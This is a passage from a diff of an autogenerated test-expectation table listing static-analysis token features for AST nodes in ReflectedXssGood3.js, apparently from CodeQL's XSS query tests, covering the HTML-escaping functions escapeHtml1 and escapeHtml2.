+| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:13 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:13 | lastIndex | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:13 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:13 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:13 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastInd ... dex + 1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastInd ... dex + 1 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastInd ... dex + 1 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastInd ... dex + 1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastInd ... dex + 1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastIndex | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:5:36:25 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:17:36:25 | index + 1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:17:36:25 | index + 1 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:17:36:25 | index + 1 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:17:36:25 | index + 1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:17:36:25 | index + 1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:25:36:25 | 1 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:25:36:25 | 1 | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:25:36:25 | 1 | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:25:36:25 | 1 | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:25:36:25 | 1 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:36:25:36:25 | 1 | stringConcatenatedWith | index -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:8 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:8 | html | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:8 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:8 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:8 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:8 | html | stringConcatenatedWith | -endpoint- escape | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:18 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:18 | html | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:5:37:18 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | @@ -20834,11 +138477,58 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:13:37:18 | escape | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:13:37:18 | escape | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:37:13:37:18 | escape | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:18 | lastIndex | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:18 | lastIndex | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:18 | lastIndex | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:18 | lastIndex | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:18 | lastIndex | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:28 | lastIndex !== index | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:28 | lastIndex !== index | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:28 | lastIndex !== index | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:28 | lastIndex !== index | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:40:28 | lastIndex !== index | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:42:10 | lastInd ... : html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:42:10 | lastInd ... : html | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:42:10 | lastInd ... : html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:42:10 | lastInd ... : html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:40:10:42:10 | lastInd ... : html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:10 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:10 | html | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:10 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:10 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:10 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:10 | html | stringConcatenatedWith | -endpoint- str.substring() | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:44 | html + ... index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:44 | html + ... index) | contextSurroundingFunctionParameters | (string) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:44 | html + ... index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:44 | html + ... index) | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:7:41:44 | html + ... index) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:16 | str | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:16 | str | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:16 | str | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:16 | str | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:16 | str | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:26 | str.substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:26 | str.substring | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:26 | str.substring | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:26 | str.substring | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:26 | str.substring | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | exceptional return of str.sub ... index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | exceptional return of str.sub ... index) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | exceptional return of str.sub ... index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | exceptional return of str.sub ... index) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | exceptional return of str.sub ... index) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | str.sub ... index) | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | str.sub ... index) | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | str.sub ... index) | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | str.sub ... index) | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | str.sub ... index) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:14:41:44 | str.sub ... index) | stringConcatenatedWith | '' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:18:41:26 | substring | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:18:41:26 | substring | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:18:41:26 | substring | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:18:41:26 | substring | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:18:41:26 | substring | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:28:41:36 | lastIndex | CalleeFlexibleAccessPath | str.substring | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:28:41:36 | lastIndex | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:28:41:36 | lastIndex | calleeImports | | @@ -20857,6 +138547,464 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:39:41:43 | index | enclosingFunctionName | escapeHtml1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:39:41:43 | index | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:41:39:41:43 | index | receiverName | str | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:42:7:42:10 | html | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:42:7:42:10 | html | contextSurroundingFunctionParameters | (string) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:42:7:42:10 | html | enclosingFunctionBody | string str string escape html lastIndex 0 index 0 index str length index str charCodeAt index 34 escape " 38 escape & 39 escape ' 60 escape < 62 escape > lastIndex index html str substring lastIndex index lastIndex index 1 html escape lastIndex index html str substring lastIndex index html | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:42:7:42:10 | html | enclosingFunctionName | escapeHtml1 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:42:7:42:10 | html | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:45:0 | this | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:45:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:45:0 | this | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:45:0 | this | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:45:0 | this | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | 'arguments' object of function escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | 'arguments' object of function escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | 'arguments' object of function escapeHtml2 | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | 'arguments' object of function escapeHtml2 | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | 'arguments' object of function escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | exceptional return of function escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | exceptional return of function escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | exceptional return of function escapeHtml2 | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | exceptional return of function escapeHtml2 | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | exceptional return of function escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | functio ... buf;\\n} | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | functio ... buf;\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | functio ... buf;\\n} | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | return of function escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | return of function escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | return of function escapeHtml2 | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | return of function escapeHtml2 | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:1:65:1 | return of function escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:10:45:20 | escapeHtml2 | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:45:22:45:22 | s | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:9 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:9 | buf | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:9 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:9 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:9 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf = "" | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf = "" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf = "" | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf = "" | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:7:46:14 | buf = "" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:13:46:14 | "" | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:13:46:14 | "" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:13:46:14 | "" | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:13:46:14 | "" | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:46:13:46:14 | "" | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | buf | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | buf | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | buf | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | buf | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | buf | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | i | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | i | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | i | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | i | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:10 | i | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:21 | i < s.length | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:21 | i < s.length | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:21 | i < s.length | enclosingFunctionBody | s buf i s length ch s i ch & buf & < buf < " buf " buf ch buf | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:21 | i < s.length | enclosingFunctionName | escapeHtml2 | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:10:47:21 | i < s.length | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:14 | s | contextFunctionInterfaces | escapeHtml1(string)\nescapeHtml2(s)\nescapeHtml3(value)\nescapeHtml4(s) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood3.js:47:14:47:14 | s | contextSurroundingFunctionParameters | (s) | +| 